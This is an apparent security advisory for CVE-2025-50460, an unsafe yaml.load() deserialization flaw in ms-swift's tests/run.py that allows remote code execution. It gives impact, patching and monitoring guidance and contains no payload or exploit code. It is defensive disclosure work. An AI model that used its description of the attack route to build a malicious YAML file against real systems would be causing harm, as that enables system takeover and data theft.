A critical remote code execution vulnerability has been identified in the ms-swift project, assigned CVE-2025-50460 with a CVSS score of 9.8. This flaw allows an unauthenticated attacker to take complete control of an affected system by sending a specially crafted file. Successful exploitation could lead to total system compromise, data theft, and significant operational disruption.

The vulnerability exists due to an unsafe deserialization process within the tests/run.py script of the ms-swift project. The script utilizes the yaml.load() function from a vulnerable version of the PyYAML library (e.g., 5.3.1). An attacker can exploit this by providing a malicious YAML file containing embedded Python code. When the tests/run.py script processes this file, the yaml.load() function will deserialize the data and execute the arbitrary code with the permissions of the running application, leading to remote code execution (RCE).

This vulnerability is rated as critical severity with a CVSS score of 9.8. A successful exploit would grant an attacker full control over the affected server or application environment. This could lead to severe business consequences, including the theft or destruction of sensitive data, deployment of ransomware, disruption of critical services, and use of the compromised system to launch further attacks against the internal network. The potential for complete system compromise presents a significant risk to data confidentiality, integrity, and availability, potentially causing major financial and reputational damage.

Immediate Action: Immediately update the ms-swift project to the latest patched version as recommended by the vendor. The patched version should replace the unsafe yaml.load() function with its secure alternative, yaml.safe_load(). After patching, it is crucial to monitor systems for any signs of exploitation attempts and review historical access logs for indicators of compromise prior to the patch.

Proactive Monitoring: Implement enhanced monitoring on affected systems. Look for suspicious child processes spawned by the application running the ms-swift project, unexpected outbound network connections, and unusual CPU or memory usage. Scrutinize logs for any access attempts or errors related to the tests/run.py script or the processing of YAML files.

Compensating Controls: If immediate patching is not feasible, implement the following controls:

• Use a Web Application Firewall (WAF) or intrusion prevention system (IPS) with rules to detect and block malicious YAML payloads.
• Strictly limit network access to the application or service utilizing the ms-swift project.
• Implement file integrity monitoring to detect unauthorized changes to the tests/run.py script.
• Isolate the affected system in a segmented network to prevent potential lateral movement.

Public Exploit Available: true

Given the critical CVSS score of 9.8 and the ease of exploitation, this vulnerability presents an immediate and severe threat. We strongly recommend that organizations prioritize patching all affected instances of the ms-swift project without delay. Although not yet on the CISA KEV list, its critical nature means it is a prime target for opportunistic and sophisticated attackers. Assume the vulnerability is being actively targeted and take immediate action to apply the recommended remediation or compensating controls to mitigate risk.